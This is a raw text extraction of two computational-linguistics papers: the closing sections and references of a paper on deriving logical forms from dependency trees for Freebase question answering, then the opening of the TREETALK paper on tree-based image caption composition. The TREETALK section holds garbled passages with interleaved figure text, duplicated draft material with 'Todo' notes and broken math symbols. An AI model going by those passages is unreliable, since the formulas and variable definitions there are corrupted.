Bast and Haussmann (2015) 76.4 49.4 Berant and Liang (2015) – 49.7 Yih et al. (2015) (Y&C) – 52.5 This Work DEPTREE 53.2 40.4 SIMPLEGRAPH 43.7 48.5 CCGGRAPH (+C +E) 73.3 48.6 DEPLAMBDA (+C +E) 78.0 50.3 Table 3: Question-answering results on the WebQuestions and Free917 test sets. but ranked below an incorrect answer (e.g., for where does volga river start, the annotated gold answer is Valdai Hills, which is ranked second, with Russia, Europe ranked first). In 35 cases, only a subset of the answer is predicted correctly (e.g, for what coun- tries in the world speak german, the system predicts Germany from the human language.main country Freebase relation, whereas the gold relation human language.countries spoken in gives multi- ple countries). Together, these two categories corre- spond to roughly 80% of the errors. In 10 cases, the Freebase API fails to add the gold entity to the lattice (e.g., for who is blackwell, the correct blackwell en- tity was missing). Due to the way WebQuestions was crowdsourced, 9 questions have incorrect or incom- plete gold annotations (e.g., what does each fold of us flag means is answered with USA). The remaining 3 cases are due to structural mismatch (e.g., in who is the new governor of florida 2011, the graph failed to connect the target node with both 2011 and Florida ). Due to the ungrammatical nature of WebQuestions, CCGGRAPH fails to produce ungrounded graphs for 4.5% of the complete development set, while DE- PLAMBDA is more robust with only 0.9% such errors. The CCG parser is restricted to produce a sentence tag as the final category in the syntactic derivation, which penalizes ungrammatical analyses (e.g., what 136 victoria beckham kids names and what nestle owns ). Examples where DEPLAMBDA fails due to parse er- rors, but CCGGRAPH succeed include when was blessed kateri born and where did anne frank live before the war. Note that the EXPAND operation mit- igates some of these problems. While CCG is known for handling comparatives elegantly (e.g., who was sworn into office when john f kennedy was assassi- nated ), we do not have a special treatment for them in the semantic representation. Differences in syn- tactic parsing performance and the somewhat limited expressivity of the semantic representation are likely the reasons for CCGGRAPH’s lower performance. 7 Related Work There are two relevant strands of prior work: gen- eral purpose ungrounded semantics and grounded semantic parsing. The former have been studied on their own and as a component in tasks such as seman- tic parsing to knowledge bases (Kwiatkowski et al., 2013; Reddy et al., 2014; Choi et al., 2015; Krishna- murthy and Mitchell, 2015), sentence simplification (Narayan and Gardent, 2014), summarization (Liu et al., 2015), paraphrasing (Pavlick et al., 2015) and relation extraction (Rocktäschel et al., 2015). There are two ways of generating these representations: ei- ther relying on syntactic structure and producing the semantics post hoc, or generating it directly from text. We adopt the former approach, which was pioneered by Montague (1973) and is becoming increasingly at- tractive with the advent of accurate syntactic parsers. There have been extensive studies on extracting semantics from syntactic representations such as LFG (Dalrymple et al., 1995), HPSG (Copestake et al., 2001; Copestake et al., 2005), TAG (Gar- dent and Kallmeyer, 2003; Joshi et al., 2007) and CCG (Baldridge and Kruijff, 2002; Bos et al., 2004; Steedman, 2012; Artzi et al., 2015). However, few have used dependency structures for this purpose. Debusmann et al. (2004) and Cimiano (2009) de- scribe grammar-based conversions of dependencies to semantic representations, but do not validate them empirically. Stanovsky et al. (2016) use heuristics based on linguistic grounds to convert dependen- cies to proposition structures. Bédaride and Gar- dent (2011) propose a graph-rewriting technique to convert a graph built from dependency trees and se- mantic role structures to a first-order logical form, and present results on textual entailment. Our work, in contrast, assumes access only to dependency trees and offers an alternative method based on the lambda calculus, mimicking the structure of knowledge bases such as Freebase; we further present extensive empir- ical results on recent question-answering corpora. Structural mismatch between the source semantic representation and the target application’s represen- tation is an inherent problem with approaches using general-purpose representations. Kwiatkowski et al. (2013) propose lambda-calculus operations to gen- erate multiple type-equivalent expressions to handle this mismatch. In contrast, we use graph-transduction operations which are relatively easier to interpret. There is also growing work on converting syntactic structures to the target application’s structure without going through an intermediate semantic representa- tion, e.g., answer-sentence selection (Punyakanok et al., 2004; Heilman and Smith, 2010; Yao et al., 2013) and semantic parsing (Ge and Mooney, 2009; Poon, 2013; Parikh et al., 2015; Xu et al., 2015; Wang et al., 2015; Andreas and Klein, 2015). A different paradigm is to directly parse the text into a grounded semantic representation. Typically, an over-generating grammar is used whose accepted parses are ranked (Zelle and Mooney, 1996; Zettle- moyer and Collins, 2005; Wong and Mooney, 2007; Kwiatkowksi et al., 2010; Liang et al., 2011; Berant et al., 2013; Flanigan et al., 2014; Groschwitz et al., 2015). In contrast, Bordes et al. (2014) and Dong et al. (2015) discard the notion of a target represen- tation altogether and instead learn to rank potential answers to a given question by embedding questions and answers into the same vector space. 8 Conclusion We have introduced a method for converting depen- dency structures to logical forms using the lambda calculus. A key idea of this work is the use of a single semantic type for every constituent of the dependency tree, which provides us with a robust way of com- positionally deriving logical forms. The resulting representation is subsequently grounded to Freebase by learning from question-answer pairs. Empirically, the proposed representation was shown to be superior to the original dependency trees and more robust than logical forms derived from a CCG parser. 137 Acknowledgements This work greatly benefitted from discussions with Slav Petrov, John Blitzer, Fernando Pereira, Emily Pitler and Nathan Schneider. The authors would also like to thank Christopher Potts and the three anony- mous reviewers for their valuable feedback. We ac- knowledge the financial support of EU IST Cognitive Systems IP EC-FP7-270273 “Xperience” (Steedman) and EPSRC (EP/K017845/1) in the framework of the CHIST-ERA READERS project (Lapata). References Jacob Andreas and Dan Klein. 2015. Alignment-Based Compositional Semantics for Instruction Following. In Proceedings of Empirical Methods on Natural Lan- guage Processing, pages 1165–1174. Yoav Artzi, Kenton Lee, and Luke Zettlemoyer. 2015. Broad-coverage CCG Semantic Parsing with AMR. In Proceedings of Empirical Methods on Natural Lan- guage Processing, pages 1699–1710. Jason Baldridge and Geert-Jan Kruijff. 2002. Coupling CCG and Hybrid Logic Dependency Semantics. In Pro- ceedings of Association for Computational Linguistics, pages 319–326. Junwei Bao, Nan Duan, Ming Zhou, and Tiejun Zhao. 2014. Knowledge-Based Question Answering as Ma- chine Translation. In Proceedings of Association for Computational Linguistics, pages 967–976. Hannah Bast and Elmar Haussmann. 2015. More Accu- rate Question Answering on Freebase. In Proceedings of ACM International Conference on Information and Knowledge Management, pages 1431–1440. Paul Bédaride and Claire Gardent. 2011. Deep Semantics for Dependency Structures. In Proceedings of Confer- ence on Intelligent Text Processing and Computational Linguistics, pages 277–288. Jonathan Berant and Percy Liang. 2014. Semantic Parsing via Paraphrasing. In Proceedings of Association for Computational Linguistics, pages 1415–1425. Jonathan Berant and Percy Liang. 2015. Imitation Learning of Agenda-Based Semantic Parsers. Transac- tions of the Association for Computational Linguistics, 3:545–558. Jonathan Berant, Andrew Chou, Roy Frostig, and Percy Liang. 2013. Semantic Parsing on Freebase from Question-Answer Pairs. In Proceedings of Empirical Methods on Natural Language Processing, pages 1533– 1544. Antoine Bordes, Sumit Chopra, and Jason Weston. 2014. Question Answering with Subgraph Embeddings. In Proceedings of Empirical Methods on Natural Lan- guage Processing, pages 615–620. Johan Bos, Stephen Clark, Mark Steedman, James R. Cur- ran, and Julia Hockenmaier. 2004. Wide-Coverage Semantic Representations from a CCG Parser. In Pro- ceedings of International Conference on Computational Linguistics, pages 1240–1246. Qingqing Cai and Alexander Yates. 2013. Large-scale Semantic Parsing via Schema Matching and Lexicon Extension. In Proceedings of Association for Computa- tional Linguistics, pages 423–433. Bob Carpenter. 1998. Type-Logical Semantics. MIT Press, Cambridge, MA, USA. David L. Chen and Raymond J. Mooney. 2011. Learning to Interpret Natural Language Navigation Instructions from Observations. In Proceedings of Association for the Advancement of Artificial Intelligence, pages 1–2. Eunsol Choi, Tom Kwiatkowski, and Luke Zettlemoyer. 2015. Scalable Semantic Parsing with Partial Ontolo- gies. In Proceedings of Association for Computational Linguistics, pages 1311–1320. Philipp Cimiano. 2009. Flexible Semantic Composition with DUDES. In Proceedings of International Confer- ence on Computational Semantics, pages 272–276. Michael Collins. 2002. Discriminative Training Methods for Hidden Markov Models: Theory and Experiments with Perceptron Algorithms. In Proceedings of Empiri- cal Methods on Natural Language Processing, pages 1–8. Ann Copestake, Alex Lascarides, and Dan Flickinger. 2001. An Algebra for Semantic Construction in Constraint-based Grammars. In Proceedings of Associ- ation for Computational Linguistics, pages 140–147. Ann Copestake, Dan Flickinger, Carl Pollard, and Ivan A. Sag. 2005. Minimal Recursion Semantics: An In- troduction. Research on Language and Computation, 3(2-3):281–332. Mary Dalrymple, John Lamping, Fernando C. N. Pereira, and Vijay A. Saraswat. 1995. Linear Logic for Mean- ing Assembly. In Proceedings of Computational Logic for Natural Language Processing. Marie-Catherine De Marneffe and Christopher D Manning. 2008. Stanford typed dependencies manual. Technical report, Stanford University. Ralph Debusmann, Denys Duchier, Alexander Koller, Marco Kuhlmann, Gert Smolka, and Stefan Thater. 2004. A Relational Syntax-Semantics Interface Based on Dependency Grammar. In Proceedings of Interna- tional Conference on Computational Linguistics, pages 176–182. Li Dong, Furu Wei, Ming Zhou, and Ke Xu. 2015. Ques- tion Answering over Freebase with Multi-Column Con- volutional Neural Networks. In Proceedings of Associ- ation for Computational Linguistics, pages 260–269. 138 Jeffrey Flanigan, Sam Thomson, Jaime Carbonell, Chris Dyer, and Noah A. Smith. 2014. A Discriminative Graph-Based Parser for the Abstract Meaning Repre- sentation. In Proceedings of Association for Computa- tional Linguistics, pages 1426–1436. Yoav Freund and Robert E. Schapire. 1999. Large Margin Classification Using the Perceptron Algorithm. Ma- chine Learning, 37(3):277–296, December. Claire Gardent and Laura Kallmeyer. 2003. Semantic Construction in Feature-based TAG. In Proceedings of European Chapter of the Association for Computa- tional Linguistics, pages 123–130. Ruifang Ge and Raymond Mooney. 2009. Learning a Compositional Semantic Parser using an Existing Syntactic Parser. In Proceedings of Association for Computational Linguistics, pages 611–619. Jonas Groschwitz, Alexander Koller, and Christoph Teich- mann. 2015. Graph parsing with s-graph grammars. In Proceedings of Association for Computational Linguis- tics, pages 1481–1490. Michael Heilman and Noah A. Smith. 2010. Tree Edit Models for Recognizing Textual Entailments, Para- phrases, and Answers to Questions. In Proceedings of North American Chapter of the Association for Com- putational Linguistics, pages 1011–1019. Aravind K. Joshi, Laura Kallmeyer, and Maribel Romero. 2007. Flexible Composition In LTAG: Quantifier Scope and Inverse Linking. In Harry Bunt and Reinhard Muskens, editors, Computing Meaning, volume 83 of Studies in Linguistics and Philosophy, pages 233–256. Springer Netherlands. Jayant Krishnamurthy and Tom Mitchell. 2012. Weakly Supervised Training of Semantic Parsers. In Proceed- ings of Empirical Methods on Natural Language Pro- cessing, pages 754–765. Jayant Krishnamurthy and Tom M. Mitchell. 2015. Learn- ing a Compositional Semantics for Freebase with an Open Predicate Vocabulary. Transactions of the Associ- ation for Computational Linguistics, 3:257–270. Tom Kwiatkowksi, Luke Zettlemoyer, Sharon Goldwater, and Mark Steedman. 2010. Inducing Probabilistic CCG Grammars from Logical Form with Higher-Order Unification. In Proceedings of Empirical Methods on Natural Language Processing, pages 1223–1233. Tom Kwiatkowski, Eunsol Choi, Yoav Artzi, and Luke Zettlemoyer. 2013. Scaling Semantic Parsers with On-the-Fly Ontology Matching. In Proceedings of Empirical Methods on Natural Language Processing, pages 1545–1556. John Lafferty, Andrew McCallum, and Fernando Pereira. 2001. Conditional Random Fields: Probabilistic Mod- els for Segmenting and Labeling Sequence Data. In Proceedings of International Conference on Machine Learning, pages 282–289. Mike Lewis and Mark Steedman. 2014. A* CCG Parsing with a Supertag-factored Model. In Proceedings of Empirical Methods on Natural Language Processing, pages 990–1000. Percy Liang, Michael Jordan, and Dan Klein. 2011. Learning Dependency-Based Compositional Seman- tics. In Proceedings of Association for Computational Linguistics, pages 590–599. Fei Liu, Jeffrey Flanigan, Sam Thomson, Norman Sadeh, and Noah A. Smith. 2015. Toward Abstractive Sum- marization Using Semantic Representations. In Pro- ceedings of North American Chapter of the Association for Computational Linguistics, pages 1077–1086. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven J. Bethard, and David McClosky. 2014. The Stanford CoreNLP Natural Language Pro- cessing Toolkit. In Proceedings of Association for Com- putational Linguistics, pages 55–60. Andre Martins, Miguel Almeida, and Noah A. Smith. 2013. Turning on the Turbo: Fast Third-Order Non- Projective Turbo Parsers. In Proceedings of Associa- tion for Computational Linguistics, pages 617–622. Cynthia Matuszek, Nicholas FitzGerald, Luke Zettle- moyer, Liefeng Bo, and Dieter Fox. 2012. A Joint Model of Language and Perception for Grounded At- tribute Learning. In Proceedings of International Con- ference on Machine Learning. Ryan McDonald, Fernando Pereira, Kiril Ribarov, and Jan Hajič. 2005. Non-Projective Dependency Parsing using Spanning Tree Algorithms. In Proceedings of Empirical Methods on Natural Language Processing, pages 523–530. Richard Montague. 1973. The Proper Treatment of Quan- tification in Ordinary English. In K.J.J. Hintikka, J.M.E. Moravcsik, and P. Suppes, editors, Approaches to Nat- ural Language, volume 49 of Synthese Library, pages 221–242. Springer Netherlands. Michael Moortgat. 1988. Categorical Investigations. Log- ical and Linguistic Aspects of the Lambek Calculus. Foris, Dordrecht. Michael Moortgat. 1991. Generalized Quantification and Discontinuous Type Constructors. Technical report, University of Utrecht. Shashi Narayan and Claire Gardent. 2014. Hybrid Sim- plification using Deep Semantics and Machine Transla- tion. In Proceedings of Association for Computational Linguistics, pages 435–445. Joakim Nivre, Johan Hall, Jens Nilsson, Atanas Chanev, Gülsen Eryigit, Sandra Kübler, Svetoslav Marinov, and Erwin Marsi. 2007. MaltParser: A Language- Independent System for Data-Driven Dependency Pars- ing. Natural Language Engineering, 13(2):95–135. 139 Ankur P. Parikh, Hoifung Poon, and Kristina Toutanova. 2015. Grounded Semantic Parsing for Complex Knowl- edge Extraction. In Proceedings of North American Chapter of the Association for Computational Linguis- tics, pages 756–766. Ellie Pavlick, Johan Bos, Malvina Nissim, Charley Beller, Benjamin Van Durme, and Chris Callison-Burch. 2015. Adding Semantics to Data-Driven Paraphrasing. In Pro- ceedings of Association for Computational Linguistics, pages 1512–1522. Fernando C. N. Pereira. 1990. Categorial Semantics and Scoping. Computational Linguistics, 16(1):1–10. Carl Pollard and Ivan A. Sag. 1994. Head-Driven Phrase Structure Grammar. University of Chicago Press. Hoifung Poon. 2013. Grounded Unsupervised Semantic Parsing. In Proceedings of Association for Computa- tional Linguistics, pages 933–943. Vasin Punyakanok, Dan Roth, and Wen-tau Yih. 2004. Mapping Dependencies Trees: An Application to Ques- tion Answering. In Proceedings of International Sym- posium on Artificial Intelligence and Mathematics, pages 1–10. Siva Reddy, Mirella Lapata, and Mark Steedman. 2014. Large-scale Semantic Parsing without Question- Answer Pairs. Transactions of the Association for Com- putational Linguistics, 2:377–392. Tim Rocktäschel, Sameer Singh, and Sebastian Riedel. 2015. Injecting Logical Background Knowledge into Embeddings for Relation Extraction. In Proceedings of North American Chapter of the Association for Compu- tational Linguistics, pages 1119–1129. Gabriel Stanovsky, Jessica Ficler, Ido Dagan, and Yoav Goldberg. 2016. Getting More Out Of Syntax with PropS. ArXiv e-prints, March. Mark Steedman. 2012. Taking Scope - The Natural Se- mantics of Quantifiers. MIT Press. Chuan Wang, Nianwen Xue, and Sameer Pradhan. 2015. A Transition-based Algorithm for AMR Parsing. In Proceedings of North American Chapter of the Associ- ation for Computational Linguistics, pages 366–375. Ralph Weischedel, Eduard Hovy, Martha Palmer, Mitch Marcus, Robert Belvin, Sameer Pradhan, Lance Ramshaw, and Nianwen Xue. 2011. OntoNotes: A Large Training Corpus for Enhanced Processing. In J. Olive, C. Christianson, and J. McCary, editors, Hand- book of Natural Language Processing and Machine Translation. Springer. Yuk Wah Wong and Raymond J. Mooney. 2006. Learning for Semantic Parsing with Statistical Machine Trans- lation. In Proceedings of North American Chapter of the Association for Computational Linguistics, pages 439–446. Yuk Wah Wong and Raymond Mooney. 2007. Learn- ing Synchronous Grammars for Semantic Parsing with Lambda Calculus. In Proceedings of Association for Computational Linguistics, pages 960–967. Kun Xu, Yansong Feng, Songfang Huang, and Dongyan Zhao. 2015. Question Answering via Phrasal Semantic Parsing. In Proceedings of Conference and Labs of the Evaluation Forum, pages 414–426. Yi Yang and Ming-Wei Chang. 2015. S-MART: Novel Tree-based Structured Learning Algorithms Applied to Tweet Entity Linking. In Proceedings of Association for Computational Linguistics, pages 504–513. Xuchen Yao and Benjamin Van Durme. 2014. Informa- tion Extraction over Structured Data: Question Answer- ing with Freebase. In Proceedings of Association for Computational Linguistics, pages 956–966. Xuchen Yao, Benjamin Van Durme, Chris Callison-Burch, and Peter Clark. 2013. Answer Extraction as Sequence Tagging with Tree Edit Distance. In Proceedings of North American Chapter of the Association for Compu- tational Linguistics, pages 858–867. Xuchen Yao. 2015. Lean Question Answering over Free- base from Scratch. In Proceedings of North American Chapter of the Association for Computational Linguis- tics, pages 66–70. Wen-tau Yih, Ming-Wei Chang, Xiaodong He, and Jian- feng Gao. 2015. Semantic Parsing via Staged Query Graph Generation: Question Answering with Knowl- edge Base. In Proceedings of Association for Compu- tational Linguistics, pages 1321–1331. John M. Zelle and Raymond J. Mooney. 1996. Learning to Parse Database Queries Using Inductive Logic Pro- gramming. In Proceedings of Association for the Ad- vancement of Artificial Intelligence, pages 1050–1055. Luke S. Zettlemoyer and Michael Collins. 2005. Learning to Map Sentences to Logical Form: Structured Clas- sification with Probabilistic Categorial Grammars. In Proceedings of Uncertainty in Artificial Intelligence, pages 658–666. Hao Zhang and Ryan McDonald. 2014. Enforcing Struc- tural Diversity in Cube-pruned Dependency Parsing. In Proceedings of Association for Computational Linguis- tics, pages 656–661. 140 work_sqfox4ylnzcxfbetwox2eu5t2q ---- TREETALK: Composition and Compression of Trees for Image Descriptions Polina Kuznetsova† † Stony Brook University Stony Brook, NY pkuznetsova @cs.stonybrook.edu Vicente Ordonez‡ Tamara L. Berg‡ ‡ UNC Chapel Hill Chapel Hill, NC {vicente,tlberg} @cs.unc.edu Yejin Choi†† ††University of Washington Seattle, WA yejin@cs.washington.edu Abstract We present a new tree based approach to composing expressive image descriptions that makes use of naturally occuring web images with captions. We investigate two related tasks: image caption generalization and gen- eration, where the former is an optional sub- task of the latter. The high-level idea of our approach is to harvest expressive phrases (as tree fragments) from existing image descrip- tions, then to compose a new description by selectively combining the extracted (and op- tionally pruned) tree fragments. Key algo- rithmic components are tree composition and compression, both integrating tree structure with sequence structure. Our proposed system attains significantly better performance than previous approaches for both image caption generalization and generation. In addition, our work is the first to show the empirical ben- efit of automatically generalized captions for composing natural image descriptions. 1 Introduction The web is increasingly visual, with hundreds of bil- lions of user contributed photographs hosted online. A substantial portion of these images have some sort of accompanying text, ranging from keywords, to free text on web pages, to textual descriptions di- rectly describing depicted image content (i.e. cap- tions). We tap into the last kind of text, using natu- rally occuring pairs of images with natural language descriptions to compose expressive descriptions for query images via tree composition and compression. Such automatic image captioning efforts could potentially be useful for many applications: from automatic organization of photo collections, to facil- itating image search with complex natural language queries, to enhancing web accessibility for the vi- sually impaired. On the intellectual side, by learn- ing to describe the visual world from naturally exist- ing web data, our study extends the domains of lan- guage grounding to the highly expressive language that people use in their everyday online activities. There has been a recent spike in efforts to au- tomatically describe visual content in natural lan- guage (Yang et al., 2011; Kulkarni et al., 2011; Li et al., 2011; Farhadi et al., 2010; Krishnamoorthy et al., 2013; Elliott and Keller, 2013; Yu and Siskind, 2013; Socher et al., 2014). This reflects the long standing understanding that encoding the complex- ities and subtleties of image content often requires more expressive language constructs than a set of tags. Now that visual recognition algorithms are be- ginning to produce reliable estimates of image con- tent (Perronnin et al., 2012; Deng et al., 2012a; Deng et al., 2010; Krizhevsky et al., 2012), the time seems ripe to begin exploring higher level semantic tasks. There have been two main complementary direc- tions explored for automatic image captioning. The first focuses on describing exactly those items (e.g., objects, attributes) that are detected by vision recog- nition, which subsequently confines what should be described and how (Yao et al., 2010; Kulkarni et al., 2011; Kojima et al., 2002). Approaches in this direc- tion could be ideal for various practical applications such as image description for the visually impaired. However, it is not clear whether the semantic expres- siveness of these approaches can eventually scale up to the casual, but highly expressive language peo- 351 Transactions of the Association for Computational Linguistics, 2 (2014) 351–362. Action Editor: Hal Daume III. Submitted 2/2014; Revised 5/2014; Published 10/2014. c©2014 Association for Computational Linguistics. Target'Image' A"cow!standing!in!the! water! I!no/ced!that!this!funny! cow!was"staring"at"me" A!bird!hovering!in"the" grass" You!can!see!these! beau/ful!hills!only!in" the"countryside" Object' Ac/on' Stuff' Scene' Figure 1: Harvesting phrases (as tree fragments) for the target image based on (partial) visual match. ple naturally use in their online activities. In Fig- ure 1, for example, it would be hard to compose “I noticed that this funny cow was staring at me” or “You can see these beautiful hills only in the coun- tryside” in a purely bottom-up manner based on the exact content detected. The key technical bottleneck is that the range of describable content (i.e., objects, attributes, actions) is ultimately confined by the set of items that can be reliably recognized by state-of- the-art vision techniques. The second direction, in a complementary avenue to the first, has explored ways to make use of the rich spectrum of visual descriptions contributed by online citizens (Kuznetsova et al., 2012; Feng and Lapata, 2013; Mason, 2013; Ordonez et al., 2011). In these approaches, the set of what can be described can be substantially larger than the set of what can be recognized, where the former is shaped and defined by the data, rather than by humans. This allows the resulting descriptions to be substantially more ex- pressive, elaborate, and interesting than what would be possible in a purely bottom-up manner. Our work contributes to this second line of research. One challenge in utilizing naturally existing mul- timodal data, however, is the noisy semantic align- ment between images and text (Dodge et al., 2012; Berg et al., 2010). Therefore, we also investi- gate a related task of image caption generalization (Kuznetsova et al., 2013), which aims to improve the semantic image-text alignment by removing bits of text from existing captions that are less likely to be transferable to other images. The high-level idea of our system is to harvest useful bits of text (as tree fragments) from exist- ing image descriptions using detected visual content similarity, and then to compose a new description by selectively combining these extracted (and op- tionally pruned) tree fragments. This overall idea of composition based on extracted phrases is not new in itself (Kuznetsova et al., 2012), however, we make several technical and empirical contributions. First, we propose a novel stochastic tree compo- sition algorithm based on extracted tree fragments that integrates both tree structure and sequence co- hesion into structural inference. Our algorithm per- mits a substantially higher level of linguistic expres- siveness, flexibility, and creativity than those based on rules or templates (Kulkarni et al., 2011; Yang et al., 2011; Mitchell et al., 2012), while also address- ing long-distance grammatical relations in a more principled way than those based on hand-coded con- straints (Kuznetsova et al., 2012). Second, we address image caption generalization as an optional subtask of image caption generation, and propose a tree compression algorithm that per- forms a light-weight parsing to search for the op- timal set of tree branches to prune. Our work is the first to report empirical benefits of automatically compressed captions for image captioning. The proposed approaches attain significantly bet- ter performance for both image caption generaliza- tion and generation tasks over competitive baselines and previous approaches. Our work results in an im- proved image caption corpus with automatic gener- alization, which is publicly available.1 2 Harvesting Tree Fragments Given a query image, we retrieve images that are vi- sually similar to the query image, then extract po- tentially useful segments (i.e., phrases) from their corresponding image descriptions. We then com- pose a new image description using these retrieved text fragments (§3). Extraction of useful phrases is guided by both visual similarity and the syn- tactic parse of the corresponding textual descrip- 1http://ilp-cky.appspot.com/ 352 tion. This extraction strategy, originally proposed by Kuznetsova et al. (2012), attempts to make the best use of linguistic regularities with respect to objects, actions, and scenes, making it possible to obtain richer textual descriptions than what cur- rent state-of-the-art vision techniques can provide in isolation. In all of our experiments we use the captioned image corpus of Ordonez et al. (2011), first pre-processing the corpus for relevant content by running deformable part model object detec- tors (Felzenszwalb et al., 2010). For our study, we run detectors for 89 object classes set a high confi- dence threshold for detection. As illustrated in Figure 1, for a query image de- tection, we extract four types of phrases (as tree fragments). First, we retrieve relevant noun phrases from images with visually similar object detections. We use color, texture (Leung and Malik, 1999), and shape (Dalal and Triggs, 2005; Lowe, 2004) based features encoded in a histogram of vector quantized responses to measure visual similarity. Second, we extract verb phrases for which the corresponding noun phrase takes the subject role. Third, from those images with “stuff ” detections, e.g.“water”, or “sky” (typically mass nouns), we extract preposi- tional phrases based on similarity of both visual ap- pearance and relative spatial relationships between detected objects and “stuff”. Finally, we use global “scene” similarity2 to extract prepositional phrases referring to the overall scene, e.g., “at the confer- ence,” or “in the market”. We perform this phrase retrieval process for each detected object in the query image and generate one sentence for each object. All sentences are then combined together to produce the final description. Optionally, we apply image caption generalization (via compression) (§4) to all captions in the corpus prior to the phrase extraction and composition. 3 Tree Composition We model tree composition as constraint optimiza- tion. The input to our algorithm is the set of re- trieved phrases (i.e., tree fragments), as illustrated in §2. Let P = {p0, ...,pL−1} be the set of all phrases across the four phrase types (objects, ac- tions, stuff and scene). We assume a mapping func- 2L2 distance between classification score vectors (Xiao et al., 2010) tion pt : [0,L) → T , where T is the set of phrase types, so that the phrase type of pi is pt(i). In ad- dition, let R be the set of PCFG production rules and NT be the set of nonterminal symbols of the PCFG. The goal is to find and combine a good se- quence of phrases G, |G| ≤ |T| = N = 4, drawn from P , into a final sentence. More concretely, we want to select and order a subset of phrases (at most one phrase of each phrase type) while considering both the parse structure and n-gram cohesion across phrasal boundaries. Figure 2 shows a simplified example of a com- posed sentence with its corresponding parse struc- ture. For brevity, the figure shows only one phrase for each phrase type, but in actuality there would be a set of candidate phrases for each type. Figure 3 shows the CKY-style representation of the internal mechanics of constraint optimization for the exam- ple composition from Figure 2. Each cell ij of the CKY matrix corresponds to Gij, a subsequence of G starting at position i and ending at position j. If a cell in the CKY matrix is labeled with a nontermi- nal symbol s, it means that the corresponding tree of Gij has s as its root. Although we visualize the operation using a CKY- style representation in Figure 3, note that composi- tion requires more complex combinatorial decisions than CKY parsing due to two additional considera- tions. We are: (1) selecting a subset of candidate phrases, and (2) re-ordering the selected phrases (hence making the problem NP-hard). Therefore, we encode our problem using Integer Linear Pro- gramming (ILP) (Roth and tau Yih, 2004; Clarke and Lapata, 2008) and use the CPLEX (ILOG, Inc, 2006) solver. 3.1 ILP Variables Variables for Sequence Structure: Variables α en- code phrase selection and ordering: αik = 1 iff phrase i ∈ P is selected (1) for position k ∈ [0,N) Where k is one of the N=4 positions in a sentence.3 Additionally, we define variables for each pair of ad- jacent phrases to capture sequence cohesion: 3The number of positions is equal to the number of phrase types, since we select at most one from each type. 353 A"cow in"the"countryside was"staring"at"me in#the#grass NP PP VP PP NP S i=0$ j=2$k=1$ 0 1 2 3 level and each node of that level, algorithm has to decide, which parse tag to choose. This process is represented by assignment of a particular tag to a matrix cell. The chosen tag must be a head of a rule, fi example cell 12 is assigned tag V P , correspond- ing to rule V P ! V P PP . This rule connects leafs “going out to sea” and “in the ocean”. The prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. Also we do not try all possible pairs5 of children from previous diagonal. We use technique similar to the one used in CKY parsing approach. Matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + 1)j >, where k 2 [i, j). Here and for the remainder of the paper, notation [i, j) means {i, i + 1, ..., j � 1} and r is h pq unless otherwise stated. The problem of choosing phrase order together with the best parse tree of the description is a com- plex optimization problem, which we solve using Integer Linear Programming (ILP). We use a sepa- rate ILP formulation for for sentence reordering and salient object selection, which we omit for brevity. As mentioned earlier, overall for each object we have four types of phrases. We use CKY-driven ILP formulation to combine them together into a plausi- ble descriptions which obeys PCFG rules. For the remainder of the paper we will call our ILP formu- lation ILP-TREE. We exploit Cplex (ILOG, Inc, 2006) to solve ILP problem. Todo:[mention cplex parameters. For instance, 30sec limit on generation] 3.0.2 ILP variables Phrase Indicator Variables: We define variables ↵ which indicate phrase selection and phrase ordering. ↵ijk = 1 iff phrase i of type j (1) is selected for position k 5There is only two children as we use Chomsky Normal Form ↵ij0 = 1 ↵ij1pq2 = 1 �02 S = 1 �010(NP!NP PP) = 1 �021 = 1 Where k 2 [0, N)Todo:[check for the whole pa- per if k ranges from 0] indexes one of N=4 positions in a sentence6. Phrase ordering is captured by indicator variables for adjacent pairs of phrases: ↵ijkpq(k+1) = 1 iff ↵ijk = ↵pq(k+1) = 1 (2) An example of ILP-CKY at Figure 3 shows selec- tion of phrases and their ordering: “The little boat”, “going out to sea” and “in the ocean”. Tree Indicator Variables: We also define variables �, which are indicators of CKY matrix content (Fig- ure 3). �ijs = 1 iff cell ij of the matrix is assigned (3) parse tree symbol s Todo:[Rename symbols to tags throughout the pa- per] Where i 2 [0, N) indexes CKY matrix diagonals and j 2 [0, N � i) indexes elements of diagonal i. In order to model rule selection at each CKY step, we define variables, which correspond to a PCFG rule used at the given cell ij of CKY matrix: �ijkr = 1 iff �ijh = �ikp (4) = �(k+1)jq = 1, Where r = h pq 2 R and k 2 [i, j). Value k corresponds to the choice of children for the current cell. 6The number of positions is equal to the number of phrase types Figure 2: An example scenario of tree composition. Only the first three phrases are chosen for the composition. αijk = 1 iff αik = αj(k+1) = 1 (2) Variables for Tree Structure: Variables β encode the parse structure: βijs = 1 iff the phrase sequence Gij (3) maps to the nonterminal symbol s ∈ NT Where i ∈ [0,N) and j ∈ [i,N) index rows and columns of the CKY-style matrix in Figure 3. A cor- responding example tree is shown in Figure 2, where the phrase sequence G02 corresponds to the cell la- beled with S. We also define variables to indicate selected PCFG rules in the resulting parse: βijkr = 1 iff βijh = βikp (4) = β(k+1)jq = 1, Where r = h → pq ∈ R and k ∈ [i,j). Index k points to the boundary of split between two children as shown in Figure 2 for the sequence G02. Auxiliary Variables: For notational convenience, we also include: γijk = 1 iff ∑ s∈NT βijs (5) = ∑ s∈NT βiks = ∑ s∈NT β(k+1)js = 1 3.2 ILP Objective Function We model tree composition as maximization of the following objective function: F = ∑ i Fi × N−1∑ k=0 αik (6) + ∑ ij Fij × N−2∑ k=0 αijk + ∑ ij j−1∑ k=i ∑ r∈R Fr ×βijkr NP NP S A"cow PP PP-VP in"the" countryside VP VP was"staring" at"me PP in#the#grass 00" 01" 02" 03" 11" 12" 13" 33" 22" 23" k=1$ k=0$ level and each node of that level, algorithm has to decide, which parse tag to choose. This process is represented by assignment of a particular tag to a matrix cell. The chosen tag must be a head of a rule, fi example cell 12 is assigned tag V P , correspond- ing to rule V P ! V P PP . This rule connects leafs “going out to sea” and “in the ocean”. The prob- lem is to find tag assignment for each cell of the ma- trix, given some cells can be empty, if they do not connect children cells. latter correspond to children branches of the tree and belong to the previous diag- onal in the left-to-right order. Also we do not try all possible pairs5 of children from previous diagonal. We use technique similar to the one used in CKY parsing approach. Matrix cell pairs corresponding to <right,left> children pairs are < ik, (k + 1)j >, where k 2 [i, j). Here and for the remainder of the paper, notation [i, j) means {i, i + 1, ..., j � 